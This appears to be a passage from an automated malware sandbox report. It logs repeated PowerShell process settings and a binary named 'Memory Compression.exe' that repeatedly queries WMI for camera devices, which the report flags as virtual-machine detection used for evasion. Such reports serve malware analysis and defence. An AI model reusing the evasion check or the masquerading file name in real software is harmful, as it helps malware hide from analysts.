                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
